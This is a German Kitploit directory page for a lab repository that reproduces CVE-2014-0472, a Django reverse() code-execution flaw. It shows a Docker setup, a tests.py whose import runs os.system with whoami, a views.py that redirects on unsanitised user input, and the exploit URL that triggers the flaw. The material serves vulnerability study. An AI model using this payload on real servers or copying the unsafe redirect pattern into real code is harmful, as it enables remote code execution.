Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-0472 — CVE-2014-0472 Django unerwartete Codeausführung mittels reverse() | Kitploit
Tools/GitHubGitHub/christasa/cve-2014-0472
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Django unerwartete Codeausführung mittels reverse()

Repository anzeigen
71vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2014-0472

Verwende

root@kitploit:~
docker-compose up -d

Greife auf localhost:8083 zu

Referenz: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. Es sind eine oder mehrere Views vorhanden, die eine URL basierend auf Benutzereingaben erstellen (üblicherweise ein "next"-Parameter in einer Query-String, der angibt, wohin nach erfolgreichem Abschluss einer Aktion weitergeleitet werden soll).
  2. Einem Angreifer sind ein oder mehrere Module bekannt, die auf dem Python-Import-Pfad des Servers existieren und bei Import eine Codeausführung mit Nebenwirkungen durchführen.

In tests.py

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

In views.py

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

Verwende die redirect-Funktion, um die bösartige Funktion aufzurufen.

avater

Verwende den Exploit

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

Ausgenutzt

avater

Tool herunterladen